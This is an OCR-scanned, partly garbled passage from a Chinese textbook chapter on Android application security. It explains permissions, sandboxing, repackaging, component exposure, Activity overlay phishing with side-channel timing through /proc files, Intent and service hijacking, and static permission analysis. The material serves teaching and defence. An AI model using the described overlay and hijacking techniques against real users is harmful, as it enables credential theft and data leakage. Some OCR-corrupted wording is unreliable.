Android 应 用 申请 的 权限 需要 明确 写 在 应 用 
程序 安装 包 中 的 AndroidManifest. xml 文件 中 ， 
使 用 二 uses-permission 二 标签 指定 ,在 安装 时 以 
列表 形式 展示 给 用 户 , 如 图 11-2 所 示 。 此 外 ,如 
果 应 用 程序 想 对 自己 拥有 的 某 些 资源 或 功能 进行 
访问 控制 ,也 可 以 声明 自 定义 权限 ,只 有 申请 了 相 
应 权限 的 应 用 程序 才 可 以 访问 这 些 资源 。 自 定义 


TUR 3E 3 — permission > , < permission-group— 





一 permission-tree 二 等 标签 指定 

Android 权限 分 为 4 种 保护 级 别 : Normal, 
Dangerous, Signature 以 及 SignatureOrSystem。 其 
中 ,Normal 级 别 的 权限 只 要 申请 间 被 授予 ; 
Dangerous 级 别 的 权限 涉及 读 取 通讯 录 等 敏感 操 
NE ,需要 在 应 用 程序 安装 时 经 用 户 同 意 方 可 使 用 ; 
Signature 级 别 的 权限 只 有 拥有 与 声明 权限 的 应 用 
相同 签名 的 应 用 才 可 以 使 用 :SignatureOrSystem 级 
别 的 权限 只 有 系统 应 用 或 者 与 系统 应 用 拥有 相同 
签名 的 应 用 方 可 使 用 。 图 11-2 App 安装 时 的 权限 列表 
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原生 系统 在 Android 6. 0 之 前 ,用 户 或 者 选择 同意 应 用 程序 使 用 所 有 申请 的 权限 ,或 者 
拒绝 安装 该 应 用 ,并 且 在 选择 了 安装 之 后 用 户 也 无 法 得 知 应 用 程序 是 如 何 使 用 所 获取 的 权 
限 的 ,也 无 法 对 其 进行 动态 控制 。 然 而 很 多 第 三 方 ROM 已 经 将 动态 权限 控制 功能 添加 进 
了 系统 中 ,在 应 用 程序 访问 受权 限 保护 的 API 时 弹出 对 话 框 询问 用 户 是 否 对 当前 的 操作 放 
行 。 有 些 ROM 甚至 在 应 用 程序 被 安装 时 便 提供 权限 管理 ,允许 用 户 在 禁止 当前 应 用 获取 
某 些 权限 的 情况 下 依旧 成 功 安装 该 应 用 。 

Android 6.0 之 前 ,系统 对 于 应 用 程序 权限 的 处 理 过 程 如 下 : 在 Android 应 用 的 安装 
过 程 中 ,Android 系统 的 PackageManager 通过 解析 AndroidManifest. xml 文件 获取 当前 
应 用 申请 的 权限 列表 并 保存 下 来 . 当 应 用 程序 调用 受权 限 保护 的 API 时 ,相应 的 API 便 
会 调用 Android 系统 提供 的 权限 检查 算法 检查 当前 应 用 是 否 具有 相应 的 权限 。Android 
系统 中 大 部 分 权限 采用 上 述 方式 实施 检查 ,但 有 一 小 部 分 权限 通过 UNIX 系统 的 群 组 
(Groups) 的 方式 实现 授权 管理 。 当 申请 有 INTERNET, WRITE _EXTERNAL _ 
STORAGE 或 者 BLUETOOTH 权限 的 应 用 程序 被 安装 的 时 候 ,Android 系统 会 将 其 分 
配 到 特定 的 Linux 群 组 (Group) 中 ,这些 Linux 群 组 对 相应 的 sockets 和 文件 具有 访问 权 
限 。 这 样 做 的 好 处 是 ,应 用 程序 在 调用 API 时 , 便 可 以 直接 操作 sockets 和 文件 ,而 不 需 
要 频繁 地 进行 权限 检查 。 

原生 系统 从 Android 6. 0 开始 添加 了 动态 权限 管理 机 制 ,修改 后 的 动态 权限 管理 机 
制 涉 及 两 类 系统 权限 EI Normal 和 Dangerous。 其 中 ,Normal 权限 由 于 不 会 对 用 户 的 隐 
私产 生 威胁 ,因此 只 要 一 个 应 用 在 manifest 文件 中 
声明 了 相关 的 Normal 权限 ,系统 就 自动 将 权限 授予 
该 应 用 ;而 对 于 Dangerous 权限 的 使 用 ,应 用 程序 除 
了 要 在 manifest 文件 中 列 出 ,还 需要 在 程序 运行 过 
程 中 动态 请 求 使 用 .经 用 户 同意 授权 后 方 可 实际 使 
用 。 由 于 用 户 可 以 随时 撤回 任何 应 用 对 任何 权限 
































的 使 用 ,因此 应 用 程序 在 使 用 权限 时 需要 首先 调用 B Mow Permission to 
checkSelfPermission 函数 检查 自己 是 否 获取 了 该 — access your contacts? 
权限 的 授权 。 如 果 已 经 获取 , 则 程序 可 以 直接 运 Maky 

行 ; 如 果 没 有 获取 则 需要 通过 requestPermissions oeny 


函数 请 求 用户 授 权 , 该 函数 的 调用 将 会 在 界面 上 
弹出 一 个 系统 对 话 框 ,向 用 户 展示 当前 权限 申请 
的 信息 ,如 图 11-3 所 示 。 此 外 . Android 还 提供 了 
shouldShowRequestPermissionRationale 函数 ,在 应 
用 程序 申请 的 权限 被 用 户 拒 绝 后 ,再 次 申请 时 向 用 
户 展示 申请 该 权限 的 必要 性 说 明 。 

Android 6. 0 的 权限 是 基于 权限 组 进行 管理 的 ， 

同一 个 组 的 任何 一 个 权限 被 授权 给 了 应 用 程序 ,其 

他 权限 也 将 自动 被 授权 。 例 如 ,用 户 同意 为 应 用 A 授权 WRITE_CONTACTS 权限 的 同 
时 ,应 用 A 同时 获取 了 READ CONTACTS fll GET ACCOUNTS 权限 。 
































图 11-3 ”请求 用 户 授权 对 话 框 
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考虑 到 兼容 性 , 当 一 个 targetSdkVersion 低 于 23 的 应 用 运行 于 Android 6.0 系统 上 
时 ,权限 的 管理 流程 依然 使 用 旧版 本 的 权限 管理 ,用 户 需要 在 安装 时 接受 应 用 申请 的 所 有 
权限 ,否则 应 用 无 法 被 安装 。 但 是 在 安装 完 之 后 ,用 户 可 以 随时 取消 已 经 授权 的 权限 ,此 
时 需要 这 些 权限 的 函数 将 返回 null 或 者 0, 有 可 能 引起 应 用 的 崩溃 。 


1112 沙 箱 隔 离 


Android 系统 除了 为 每 个 应 用 分 配 了 不 同 的 UID 以 适用 更 细 粒 度 的 权限 管理 机 制 ， 
还 为 每 一 个 应 用 分 配 了 一 个 Dalvik 虚拟 机 实例 ,每 一 个 应 用 程序 及 其 Dalvik 虚拟 机 运行 
于 一 个 独立 的 Linux 进程 空间 ,由 于 底层 Linux 系统 的 进程 内 存 管理 机 制 确保 不 同 进程 
之 间 的 内 容 空间 是 隔离 的 ,此 外 Android 系统 的 权限 机 制 保证 不 同 应 用 之 间 的 资源 不 能 
任意 访问 ,从 而 形成 了 天 然 的 应 用 程序 沙 箱 , 使 得 不 同 的 Android 应 用 之 间 不 能 随意 干扰 
彼此 的 运行 。 

Dalvik 虚拟 机 的 功能 可 以 参照 Java 虚拟 机 来 理解 ,不 同 之 处 在 于 ,Java 虚拟 机 运行 
的 是 Java 字 节 码 , 而 Dalvik 虚拟 机 执行 的 是 dex 文件 ;此 外 Dalvik 指令 集 基 于 寄存 器 架 
构 , 而 Java 基于 栈 实现 。Android 应 用 程序 使 用 Java 语言 进行 开发 ,但 是 在 Java 文件 编 
译 成 class 文件 后 ,还 会 通过 dx 工具 将 所 有 的 class 文件 转换 成 一 个 dex 文件 供 Dalvik 
虚拟 机 执行 。 每 一 个 Android 应 用 都 分 配 了 一 个 独立 的 Dalvik 虚拟 机 实例 ,而 每 一 个 
Dalvik 虚拟 机 实例 都 是 一 个 独立 的 进程 空间 。 通 过 这 种 方式 ,Android 应 用 将 不 具备 信 
任 关系 的 应 用 程序 相互 隔离 。 

而 对 于 相互 间 存 在 信任 关系 的 应 用 而 言 , 如 同一 个 开发 者 开发 的 不 同 应 用 ,开发 者 可 
以 通过 为 它们 设置 sharedUserID 的 方式 ,使 拥有 相同 的 sharedUserID 的 应 用 运行 于 同 
一 进程 空间 中 。 


11.2 Android 软件 典型 安全 问题 


Android 软件 的 安全 问题 大 致 可 以 分 为 恶意 行为 和 安全 漏洞 两 大 类 。Android 恶意 
软件 的 恶意 行为 包括 隐私 窃取 ,资费 消耗 、. 运 程控 制 . 恶 意 传播 .流氓 行为 (如 自动 下 载 ) 
等 。Android 软件 的 安全 漏洞 包括 WebView 漏洞 .组 件 暴 露 漏洞 .SSL 协议 不 安全 实现 
漏洞 等 。 下 面 将 对 其 中 部 分 典型 的 恶意 行为 和 安全 漏洞 进行 详细 介绍 。 


1121 隐私 窃取 


隐私 窃取 是 指 在 用 户 不 知情 或 未 授权 的 情况 下 获取 用 户 个 人 信息 并 传递 出 设备 的 行 
为 。 智 能 手机 中 存储 了 通讯 录 、 邮 件 、 短 信 信 息 、 个 人 照片 等 大 量 用 户 隐 私信 息 ,这 些 信息 
对 于 攻击 者 而 言 具有 很 大 的 吸引 力 , 因 此 针对 智能 手机 的 隐私 窃取 攻击 一 直 十 分 猩 狐 。 

根据 窃取 的 隐私 数据 类 型 的 不 同 , 可 以 将 隐私 窃取 攻击 行为 大 致 分 为 传统 隐私 窃取 
和 新 型 隐私 窃取 两 大 类 。 其 中 传统 隐私 窃取 指 的 是 窃取 目标 设备 上 存储 的 通讯 录 、 短 信 、 
个 人 照片 等 信息 ;新 型 隐私 窃取 攻击 窍 取 的 是 应 用 程序 内 部 的 用 户 数据 以 及 通过 侧 信道 
攻击 技术 获取 的 一 些 数据 。 
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对 于 传统 隐私 窃取 而 言 , 获 取 通 讯 录 等 隐私 数据 的 直接 途径 是 调用 相关 的 Android API, 
而 这 些 API 多 数 情况 下 都 有 相应 的 权限 进行 保护 ,因此 ,实施 这 类 攻击 的 恶意 应 用 都 需要 申请 
相关 的 权限 ,这 一 特征 可 以 作为 检测 这 类 攻击 的 一 个 先 验 条 件 。 除 了 获取 这 些 信息 ,恶意 软件 
还 需要 通过 某 些 方法 将 这 些 信息 传递 出 去 ,最 直接 的 方法 是 通过 网 络 进行 传递 。 

对 于 新 型 隐私 窃取 而 言 , 需 针 对 特定 的 数据 和 特定 的 应 用 设计 特定 的 攻击 场景 。 例 
如 ,研究 人 员 利 用 移动 社交 应 用 中 的 通讯 录 匹 配 功 能 ,通过 上 传 海量 用 户 手机 号 码 , 可 以 
获取 应 用 账号 与 手机 号 码 之 间 的 对 应 关系 以 及 用 户 账户 的 详细 资料 ,通过 多 款 社交 应 用 
之 间 数 据 的 一 致 性 分 析 , 可 以 获取 大 量 用 户 的 真实 信息 外。 此 外 ,通过 移动 智能 设备 上 的 
传感器 数据 推测 用 户 输入 也 一 直 是 近 几 年 研究 的 热点 问题 。 


1122 应 用 重 打 包 


重 打包 一 直 是 Android 应 用 面临 的 一 个 重要 的 安全 问题 ,Android 应 用 易于 反 编 译 
和 修改 ,使 得 恶意 开发 者 可 以 轻易 算 改 热门 应 用 的 代码 ,修改 其 中 内 栓 的 广告 模块 ,或 者 
向 其 中 嵌入 恶意 代码 ,利用 原 应 用 下 载 量 大 的 优势 获得 广泛 传播 。 研 究 人 员 发 现 , 在 
2012 年 前 出 现 的 恶意 应 用 中 ,大 约 有 86% 的 恶意 应 用 采用 了 重 打包 正常 应 用 的 方式 来 存 
放 恶 意 载荷 中。 对 重 打 包 应 用 的 检测 也 一 直 受 到 研究 人 员 的 广泛 关注 。 


1123 组 件 安全 问题 


Android 应 用 程序 有 4 个 基本 组 件 ,分 别 为 活动 (Activity) |i (Service) 、 内 容 提 供 
者 (ContentProvider) ,广播 接收 器 (BroadcastReceiver)。4 个 组 件 的 基本 功能 如 表 11-1 
所 示 。 











表 11-1 Android 应 用 4 个 组 件 的 功能 














组 ” 件 x 能 
Activity 界面 显示 组 件 , 是 接收 用 户 交互 操作 的 主要 接口 
Service 台 运 行 的 服务 组 件 ,可 在 后 台 长 时 间 运 行 ,处 理 一 些 耗 时 操作 
ContentProvider 应 用 间 数 据 共享 的 组 件 , 为 增 、 删 \ 改 、 查 等 操作 提供 了 统一 的 接口 
BroadcastReceiver 接收 系统 或 应 用 程序 发 出 的 特定 广播 通知 ,并 做 出 响应 








每 个 Android 应 用 都 由 4 类 组 件 中 的 一 类 或 几 类 组 件 共 同 构成 ,组 件 中 出 现 的 安全 
问题 将 直接 影响 整个 Android 应 用 的 安全 。 

1. 组 件 暴露 

从 安全 的 角度 来 讲 , 一 个 Android 应 用 中 的 组 件 应 仅 限 于 和 同一 个 应 用 中 的 组 件 进 
行 交互 , 即 Android 应 用 中 的 组 件 应 当 为 私有 组 件 。 但 是 ,Android 应 用 也 可 以 通过 组 件 
暴露 将 部 分 功能 提供 给 其 他 应 用 使 用 ,组 件 暴露 有 助 于 应 用 程序 开发 者 利用 其 他 应 用 程 
序 已 有 的 数据 和 服务 完成 自己 需要 的 功能 ,提供 功能 复 用 ,减轻 开发 者 的 负担 。 

开发 者 可 以 通过 在 AndroidManifest. xml 文件 中 声明 组 件 时 设置 其 exported 属性 
值 的 方式 来 决定 组 件 是 否 公开 。exported 属性 值 为 true, 则 当前 组 件 为 公开 组 件 , 反 之 为 
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私有 组 件 。exported 属性 的 默认 值 为 false. Hl. Android 应 用 中 的 组 件 默 认为 私有 组 件 ， 
但 若 当 前 组 件 未 设置 exported 属性 的 值 ,而 是 定义 了 意图 过 滤器 (intent filter) , 则 意味 
着 外 部 应 用 可 以 通过 相应 的 Intent 使 用 该 组 件 , 因 此 此 时 该 组 件 的 exported 属性 值 默认 
为 true。 但 是 exported 属性 并 不 是 限制 组 件 暴 露 的 唯一 方法 ,还 可 以 使 用 权限 来 限制 能 
够 与 该 组 件 交 互 的 外 部 实体 。 

需要 说 明 一 点 的 是 ,在 Android 4. 2 之 前 ,ContentProvider 组 件 的 exported 属性 值 
默认 为 true, 即 外 部 应 用 都 可 以 访问 当前 的 ContentProvider 组 件 , 除 非 该 组 件 设置 了 访 
问 权 限 。 

有 时 ,将 组 件 设置 为 可 公开 访问 是 必要 的 ,例如 应 用 程序 的 MainActivity 通常 是 公 
开 的 ,以 便 为 一 个 应 用 程序 的 启动 提供 一 个 入 口 点 ,然而 过 多 暴露 应 用 中 的 组 件 会 大 大 降 
低 Android 应 用 的 安全 性 。 学 者 们 对 组 件 暴露 引发 的 安全 问题 进行 了 详细 的 研究 ,目前 
已 经 发 现 的 问题 有 以 下 几 类 。 

D 权限 重 委派 

权限 重 委 派 (Privilege Escalation Attacks on Android) 是 指 一 个 不 具有 相关 权限 的 
Android 应 用 可 以 通过 另 一 个 具有 相关 权限 的 应 用 暴露 的 组 件 访问 受 该 权限 保护 的 资 
I., WMA 11-4 所 示 ,App A、App B 和 App C 为 安装 在 同一 台 设备 上 的 3 个 Android 
应 用 ,CA Caz Cm \ Ce Ce Ce 分 别 为 3 个 应 用 中 的 组 件 , 其 中 Ce、Ces 分 别 被 P1 和 P2 
两 个 权限 保护 , 即 只 有 拥有 权限 PT 的 应 用 才能 访问 组 件 Co ,拥有 权限 P2 的 应 用 可 以 访 
问 组 件 Ce。。 应 用 BB 拥有 权限 P1, 因 此 可 以 通过 组 件 Ca 访问 应 用 C 的 组 件 Ce ,而 应 用 
A 由 于 不 具有 权限 P1, 所 以 应 用 A 的 两 个 组 件 都 不 能 直接 访问 应 用 C 的 组 件 Ce 。 但 是 
由 于 应 用 BB 将 其 组 件 Ca 公开 ,导致 应 用 A 可 以 通过 访问 组 件 Ca 来 间接 访问 Co o 
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图 11-4 权限 重 委派 


2) ContentProvider 组 件 暴露 导致 的 数据 泄露 和 内 容 污 染 

很 多 Android 应 用 选择 使 用 ContentProvider 来 访问 应 用 私有 数据 或 者 配置 应 用 设 
置信 息 ,然而 在 Android 4. 2 之 前 ,ContentProvider 组 件 默 认 是 公开 的 ,因此 为 这 些 应 用 
带 来 了 安全 隐患 。 对 ContentProvider 组 件 引 起 的 安全 问题 的 研究 发 现 ,ContentProvider 
组 件 暴露 可 能 导致 设备 上 的 用 户 数据 和 应 用 内 的 私有 数据 被 动 泄 露 以 及 系统 或 应 用 程序 
的 设置 被 自 改 加 。 
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具体 来 说 ,通过 访问 相关 Android 应 用 暴露 的 ContentProvider 组 件 ,攻击 者 可 能 获 
取 的 数据 有 : 四 用 户 收 到 和 发 出 的 SMS 消息 ; 四 设备 上 的 联系 人 信息 ; @ 即 时 通信 应 用 
中 的 会 话 信息 ; 四 用 户 标识 ,例如 用 户 名 、 密 码 、 著 名 社交 网 站 的 认证 token 等 ; @ 浏 览 器 
历史 记录 和 标签 ; @ 接 听 或 拨打 的 电话 记录 等 。 而 通过 针对 ContentProvider 组 件 的 
insert, update 等 操作 ,攻击 者 可 以 实施 修改 设备 设置 信息 ,后 台 下 载 任意 文件 等 操作 。 

2. Activity 覆盖 攻击 

Activity 是 Android 应 用 与 用 户 进行 交互 的 主要 组 件 ,类 似 Windows 窗口 ,但 是 与 
传统 电脑 不 同 的 是 ,Android 并 没有 在 手机 屏幕 上 显示 当前 与 用 户 进行 交互 的 是 哪个 应 
用 的 界面 ,因此 恶意 应 用 可 以 通过 Activity 覆盖 攻击 使 用 钓鱼 界面 获取 用 户 的 交互 信息 。 

Activity 覆盖 攻击 是 指 恶意 Android 程序 在 后 台 监 控 当 前 界面 的 变换 , 当 发 现 目标 
应 用 的 目标 Activity 切换 到 前 台 时 ,用 自己 伪造 的 钓鱼 界面 代替 目标 界面 展示 在 前 台 , 骗 
取 用 户 输入 。 由 于 用 户 只 能 从 界面 展示 上 判断 当前 与 之 交互 的 应 用 程序 , 当 钓 鱼 界面 与 
目标 界面 不 存在 肉眼 可 辨 的 差别 时 ,用 户 难 以 发 现 Activity 覆盖 攻击 的 存在 。 

Activity 覆盖 攻击 的 步骤 如 图 11-5 所 示 , 其 中 存在 两 个 难点 : 设计 钓鱼 界面 和 探测 
合适 的 弹出 时 间 。 





线 下 运行 时 





确定 目标 Activity [| 设计 钓鱼 界面 | 叫 检 测 目标 Activity 的 出 现 [e] 弹出 钓鱼 界面 pem 退出 钓鱼 界面 















































图 11-5 Activity 覆盖 攻击 步骤 


1) 钓鱼 界面 设计 

钓鱼 界面 的 设计 目标 是 将 一 个 与 目标 界面 十 分 相似 的 界面 展示 在 目标 界面 之 上 。 外 观 
上 的 展示 参照 目标 界面 的 布局 设计 进行 布局 即 可 ,界面 展示 的 载体 窗口 的 选择 却 有 多 种 途 
径 。 最 直接 的 方法 是 使 用 Activity 组 件 来 实现 钓鱼 界面 ,但 是 当 钓鱼 Activity 切换 到 屏幕 上 
时 ,其 所 属 的 恶意 程序 也 将 被 切换 到 近期 任务 列表 的 顶端 ,用 户 通过 查看 近期 任务 列表 即 可 
能 发 觉 攻 击 的 存在 。 除 了 使 用 Activity 来 构建 钓鱼 界面 ,恶意 程序 还 可 以 使 用 Toast 和 自 定 
义 窗 口 覆 盖 当 前 界面 上 的 Activity 组 件 , 并 且 Toast 和 自 定义 窗口 的 使 用 不 会 将 恶意 程序 切 
换 到 近期 任务 列表 的 顶端 。 此 外 在 使 用 自 定义 窗口 时 ,还 可 以 通过 为 窗口 设置 不 同 的 
FLAG 灵活 设 定 窗口 接收 点 击 事件 的 能 力 ,使 得 攻击 场景 的 设计 更 加 巧妙 。 

2) 弹出 时 间 探 测 

寻找 合适 的 弹出 时 间 是 保持 Activity 覆盖 攻击 的 隐蔽 性 的 重要 方面 ,Bianchi 等 人 对 
相关 的 技术 进行 了 很 好 的 总 结 中 , 简 述 如 下 。 

CD 读 取 系统 日 志 信息 。 

在 Android 4.1 之 前 的 系统 里 ,所 有 的 应 用 和 系统 服务 都 可 以 将 日 志 信 息 和 调试 信 
息 写 人 一 个 系统 日 志 里 ,任何 申请 了 READ_LOGS 权限 的 应 用 都 可 以 读 取 该 日 志 中 的 信 
息 ,通过 读 取 ActivityManager 服务 写 入 的 日 志 信息 ,应 用 程序 就 可 以 获知 最 后 一 个 绘 
在 屏幕 上 的 Activity。 为 了 解决 系统 日 志 信 息 全 局 可 读 导 致 的 安全 隐患 ,在 Android 4. 1 
之 后 ,一 个 应 用 只 能 读 取 它 自己 创建 的 日 志 信息 。 


第 11 章 “移动 智能 终端 应 用 软件 安全 性 分 析 





(2) 读 取 当 前 运行 应 用 信息 。 

Android 5. 0 之 前 ,拥有 GET | TASKS 权限 的 Android 应 用 可 以 通过 调用 
getRunningTasks 函数 获取 当前 运行 应 用 的 信息 ,获知 哪个 应 用 在 前 台 运 行 以 及 哪个 
Activity 展示 在 屏幕 前 端 。 但 是 该 功能 在 Android 5.0 之 后 发 生 了 改变 ,Android 应 用 通 
过 调用 getRunningTasks 函数 仅 可 以 获取 自身 Activity 的 信息 。 

(3) 读 取 proc 文件 系统 信息 。 

Android 应 用 可 以 从 /proc 目录 下 获取 当前 运行 的 App 的 列表 ,并 且 读 取 /proc/ 
— process, pid /cmdline ffil/proc/- process pid— /cgroup 文件 的 信息 ,其 中 cmdline X 
件 中 给 出 了 拥有 二 process_pid 二 的 App 的 包 名 ,而 cgroup 文件 给 出 了 该 应 用 是 否 在 前 
台 的 信息 。 当 拥有 二 process_pid 二 的 App 在 前 台 运 行 时 ,/proc/ 二 process_pid 记 /cgroup 
文件 的 内 容 如 图 11-6 所 示 ; 当 App 未 在 前 台 运 行 时 ,/proc/ 所 process_pid 二 /cgroup X 
件 的 内 容 如 图 11-7 所 示 ,因此 通过 监控 /proc/ 二 process_pid 记 /cgroup 文件 内 容 的 改变 ， 
可 以 获知 当前 是 哪个 应 用 被 切换 到 了 前 台 。 


图 11-6 App 处 于 前 台 时 cgroup 文件 的 内 容 


图 11-7 App 未 在 前 台 运 行 时 cgroup 文件 的 内 容 

















此 外 ,还 可 以 根据 Chen 等 人 提出 的 通过 共享 内 存 进行 侧 信 和 道 攻击 的 方法 中 判断 当 
前 界面 上 显示 的 Activity 是 否 是 目标 Activity。 应 用 中 每 一 次 Activity 的 切换 都 会 引起 
其 所 使 用 的 共享 内 存 的 变化 ,关于 共享 内 存 的 使 用 情况 可 以 查看 /proc/ 一 process_pid 二 / 
statm 文件 的 内 容 ,由 于 一 个 Activity 是 一 个 全 屏 窗口 ,因此 它 的 创建 所 引起 的 共享 内 存 
使 用 量 的 变化 对 于 一 个 给 定 的 设备 来 说 是 一 个 固定 的 值 。 知 晓 有 Activity 切换 事件 发 生 
后 ,通过 事先 收集 的 Activity 特征 和 Activity 切换 图 来 判断 当前 是 该 应 用 的 哪个 Activity 
在 前 台 。 Activity 特征 包含 Activity 切换 到 前 台 时 是 否 调 用 输入 法 、 是 否 查 询 
ContentProvider、 是 否 有 联网 事件 以 及 CPU 占用 时 间 等 。 经 测试 ,该 方法 在 Android 5. 0 及 
以 上 的 系统 中 依旧 可 以 成 功 实施 。 

3. Intent 支持 

组 件 之 间 的 信息 传递 和 协调 工作 通常 通过 Intent 来 完成 , Intent. 分 为 显 式 和 隐 式 两 
种 , 显 式 Intent 是 在 要 发 送 的 Intent 对 象 中 指定 了 目标 组 件 名 称 ,只 能 由 指定 的 组 件 来 
接收 的 Intent; 隐 式 Intent 没有 明确 指出 目标 组 件 名 称 ,而 是 列 出 了 接收 者 应 该 满足 的 条 
件 , 隐 式 Intent 中 的 过 滤 条 件 通过 action, category 和 data 给 出 。 一 个 恶意 应 用 可 以 通过 
申明 一 个 符合 目标 Intent 过 滤 条 件 的 意图 过 滤器 (Intent Filter) 来 截获 未 受到 权限 保护 
的 隐 式 Intent, 获 取 其 中 传递 的 所 有 数据 .甚至 影响 正常 的 程序 运行 中 。 通 过 Intent 支持 
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可 能 发 起 的 攻击 包括 以 下 几 种 。 

D 广播 内 容 窃取 

广播 内 容 通常 通过 隐 式 Intent 进行 发 送 , 当 发 送 的 Intent 未 受到 合适 的 权限 保护 
应 用 可 以 实施 窃听 、 算 改 和 拒绝 服务 攻击 。 

恶意 应 用 可 以 通过 声明 一 个 BroadcastReceiver 组 件 并 为 其 设置 合适 的 Intent Filter 
的 方式 窃听 所 有 应 用 发 出 的 公开 广播 ,Intent 的 发 送 者 和 用 户 根本 无 从 知晓 攻击 的 存在 。 

对 于 有 序 广播 (ordered broadcast 而 言 , 广 播 数据 是 按 一 定 的 次 序 传递 给 相应 的 
BroadcastReceiver 组 件 的 ,此 时 恶意 应 用 可 以 通过 声明 一 个 优先 级 更 高 的 
BroadcastReceiver 组 件 优 先 获取 广播 信息 ,在 广播 信息 中 插入 数据 后 传递 给 后 面 的 广播 
接收 器 以 实施 数据 注入 攻击 ,或 者 将 当前 的 广播 丢弃 以 实施 拒绝 服务 攻击 。 

2) Activity 劫持 

恶意 应 用 可 以 将 自己 的 Activity 注册 为 一 个 隐 式 Intent 的 目标 Activity. A ii f BE 
目标 Activity 展示 在 界面 上 。 

-个 简单 的 Activity 支持 攻击 可 以 读 取 Intent 中 传递 的 数据 ,之 后 将 其 转发 给 目标 
Activity。 而 一 个 复杂 的 Activity 劫持 攻击 可 以 使 用 一 个 钓鱼 Activity 来 窃取 用 户 提供 
的 信息 。 例 如 一 个 应 用 中 提供 了 一 个 捐赠 按钮 , 当 用 户 点 击 该 按钮 时 ,当前 应 用 将 会 发 送 

-个 隐 式 Intent 启动 其 他 的 应 用 来 完成 支付 操作 。 如 果 一 个 恶意 Activity 截获 了 该 
Intent, 恶 意 程序 可 以 获取 用 户 提供 的 用 户 名 、 密 码 等 信息 。 

但 是 Activity 劫持 攻击 的 隐蔽 性 较 差 ,因为 当 多 个 Activity 与 一 个 隐 式 Intent 匹配 
且 用 户 未 选择 默认 接收 者 时 ,系统 将 弹出 选择 框 请 求 用 户 选 择 
响应 当前 Intent 的 目标 应 用 ,如 图 11-8 所 示 ,此 时 攻击 易 被 发 
觉 。 攻 击 者 可 以 通过 两 种 方法 绕 过 该 机 制 ,一 种 是 为 恶意 应 用 [有 
设置 与 目标 应 用 相似 的 图 标 和 名 称 ; 另 一 种 是 在 恶意 应 用 中 提 
供 更 吸引 人 的 服务 吸引 用 户主 动 选择 该 应 用 作为 目标 应 用 。 f E m 

除了 上 述 攻 击 后 果 ,Activity 劫持 攻击 还 可 以 导致 错误 注 加 Pictures 
入 攻击 。 当 一 个 应 用 通过 startActivityForResult 函数 启动 一 p Wallpapers 




























































个 Activity 时 ,被 启动 的 Activity 需要 向 其 返回 处 理 结果 ,在 


Activity 劫持 攻击 场景 下 ,恶意 Activity 可 以 向 其 调用 者 注入 
一 个 恶意 的 返回 值 。 





D 服务 劫持 

恶意 应 用 可 以 声明 一 个 Service 组 件 使 其 符合 目标 Intent 
的 过 滤 条 件 , 于 是 发 送 Intent 的 应 用 将 与 恶意 Service 组 件 建 
立 连接 ,恶意 Service 组件 可 以 窃取 数据 并 向 Intent 的 发 送 者 发 送 错误 的 运行 结果 , 当 
Intent 的 发 送 者 向 Service 组 件 提供 了 回调 函数 时 ,恶意 Service 组 件 也 可 以 利用 回调 函 
数 实施 其 他 攻击 。 与 Activity 劫持 不 同 的 是 , 当 系 统 中 有 多 个 Service 满足 一 个 Intent 的 
过 滤 条 件 时 ,系统 随机 选择 一 个 Service 进行 处 理 而 不 是 通知 用 户 进 行 选择 。 

4) 特殊 Intent 

Intent 中 可 以 放置 访问 一 个 ContentProvider 中 的 数据 的 URI, 当 Intent 的 接收 方 没 


图 11-8 系统 请 求 用 户 选 择 
目标 应 用 
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有 访问 这 个 URI 的 权限 时 ,Intent 的 发 送 方 可 以 为 Intent 添加 FLAG GRANT. READ -. 
URI PERMISSION 标识 或 者 FLAG. GRANT. WRITE URI. PERMISSION 标识 以 授 
予 接收 方 访问 权限 。 如 果 恶 意 程序 截获 了 含有 上 述 标 识 的 Intent, 则 可 以 访问 URI 连接 
的 数据 ,造成 数据 泄露 。 

此 外 ,PendingIntent 的 使 用 也 给 Android 应 用 带 来 了 很 大 的 安全 风险 。PendingIntent 
是 一 个 特殊 的 Intent, 它 保留 了 其 创建 者 所 有 的 权限 和 能 力 ,允许 接受 者 以 创建 者 的 身份 
和 权限 执行 创建 者 在 Intent 中 预先 定义 的 一 些 操作 。Li 等 人 四 在 分 析 Android 应 用 使 
用 的 推送 服务 时 发 现 ,通过 精心 设计 的 攻击 场景 ,攻击 程序 可 以 通过 PendingIntent 获取 
目标 应 用 的 数据 或 者 使 目标 应 用 执行 攻击 者 的 命令 。 


11.3 静态 分 析 





1131 权限 分 析 


权限 的 使 用 是 Android 应 用 程序 与 普通 PC 程序 存在 的 显著 不 同 ,Android 使 用 权限 
机 制 来 限制 应 用 程序 的 能 力 ,应 用 程序 只 有 申请 相应 的 权限 才 可 以 访问 并 使 用 受 保护 的 
资源 ,因此 权限 的 使 用 从 一 定 程度 上 反映 了 应 用 程序 可 能 具有 的 功能 ,通过 权限 的 使 用 来 
分 析 Android 应 用 的 安全 性 是 一 个 直观 的 切入 点 。 

Enck 等 人 中 在 2009 年 首先 提出 可 以 通过 权限 申请 判断 一 个 应 用 程序 是 否 具有 危 
险 功 能 ,其 开发 的 原型 系统 Kirin 将 危险 功能 与 实施 该 功能 所 需 的 权限 集合 对 应 ,认为 申 
请 了 这 些 权限 的 应 用 程序 具备 实施 恶意 行为 的 能 力 , 例 如 短信 吸 费 类 恶意 程序 都 申请 了 
发 送 短信 的 权限 ,远程 控制 类 恶意 程序 都 申请 了 联网 或 接收 短信 权限 等 。 但 是 申请 了 相 
应 的 权限 并 不 表示 这 些 应 用 真实 实施 了 相应 的 行为 ,分 析 具 体 权限 是 如 何 被 使 用 的 才 是 
关键 。 此 外 ,Felt 等 人 5 指出 ,应 用 程序 开发 者 在 实际 开发 过 程 中 会 申请 过 多 的 权限 ,其 
中 部 分 权限 并 未 被 实际 使 用 。 这 些 过 度 申 请 的 权限 不 仅 会 造成 Kirin 等 类 似 系 统 的 检测 
结果 具有 较 高 的 误 报 率 ,而 且 增 加 了 应 用 被 其 他 恶意 软件 利用 实施 危险 行为 的 可 能 性 。 
因此 ,检测 APK 文件 中 的 权限 使 用 点 及 未 使 用 权限 是 Android 应 用 权限 分 析 的 重点 。 

对 Android 应 用 进行 权限 检查 的 工具 有 很 多 ,这 里 介绍 一 款 常 用 的 静态 分 析 工 
H Androguard!? 。Androguard 是 对 Android 应 用 进行 静态 分 析 的 重要 工具 ,其 他 
很 多 静态 分 析 工 具 都 在 Androguard 基础 上 进行 扩展 。 分 析 人 员 可 以 使 用 Androguard 
获取 应 用 程序 的 基本 信息 ,提取 AndroidManifest. xml 文件 ,构建 函数 调用 图 等 。 针 对 权 
